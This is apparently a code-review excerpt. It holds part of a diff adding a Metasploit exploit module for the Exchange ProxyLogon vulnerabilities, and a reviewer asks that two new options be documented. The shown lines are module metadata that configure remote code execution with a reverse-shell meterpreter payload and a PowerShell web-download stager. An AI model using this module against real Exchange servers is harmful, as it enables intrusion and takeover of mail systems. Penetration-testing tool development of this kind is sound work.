modules/exploits/windows/http/exchange_proxylogon_rce.rb

```diff
@@ -0,0 +1,550 @@
+          'mekhalleh (RAMELLA Sébastien)', # Module author independent researcher (who listen to 'Le Comptoir Secu' and work at Zeop Entreprise)
+          'print("")', # https://www.o2oxy.cn/3169.html
+          'lotusdll' # https://twitter.com/lotusdll/status/1371465073525362691
+        ],
+        'References' => [
+          ['CVE', '2021-26855'],
+          ['CVE', '2021-27065'],
+          ['LOGO', 'https://proxylogon.com/images/logo.jpg'],
+          ['URL', 'https://proxylogon.com/'],
+          ['URL', 'http://aka.ms/exchangevulns'],
+          ['URL', 'https://www.praetorian.com/blog/reproducing-proxylogon-exploit'],
+          [
+            'URL',
+            'https://testbnull.medium.com/ph%C3%A2n-t%C3%ADch-l%E1%BB%97-h%E1%BB%95ng-proxylogon-mail-exchange-rce-s%E1%BB%B1-k%E1%BA%BFt-h%E1%BB%A3p-ho%C3%A0n-h%E1%BA%A3o-cve-2021-26855-37f4b6e06265'
+          ],
+          ['URL', 'https://www.o2oxy.cn/3169.html'],
+          ['URL', 'https://github.com/Zeop-CyberSec/proxylogon_writeup']
+        ],
+        'DisclosureDate' => '2021-03-02',
+        'License' => MSF_LICENSE,
+        'DefaultOptions' => {
+          'CheckModule' => 'auxiliary/scanner/http/exchange_proxylogon',
+          'HttpClientTimeout' => 60,
+          'RPORT' => 443,
+          'SSL' => true,
+          'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
+
+        },
+        'Platform' => ['windows'],
+        'Arch' => [ARCH_CMD, ARCH_X64],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Windows Dropper',
+            {
+              'Platform' => 'windows',
+              'Arch' => [ARCH_X64],
+              'Type' => :windows_dropper,
+              'CmdStagerFlavor' => %i[psh_invokewebrequest],
+              'DefaultOptions' => {
+                'DisablePayloadHandler' => false,
+                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',
+                'CMDSTAGER::FLAVOR' => :psh_invokewebrequest
+              }
+            }
+          ],
+          [
+            'Windows Command',
+            {
+              'Platform' => 'windows',
+              'Arch' => [ARCH_CMD],
+              'Type' => :windows_command,
+              'DefaultOptions' => {
+                'DisablePayloadHandler' => true,
+                'PAYLOAD' => 'cmd/windows/generic'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
+          'AKA' => ['ProxyLogon']
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('EMAIL', [true, 'A known email address for this organization']),
+      OptEnum.new('METHOD', [true, 'HTTP Method to use for the check', 'POST', ['GET', 'POST']]),
+      OptBool.new('UseAlternatePath', [true, 'Use the IIS root dir as alternate path', false])
```

Comment:
Please, can you add these new options to the documentation (`UseAlternatePath` and `IISBasePath`)?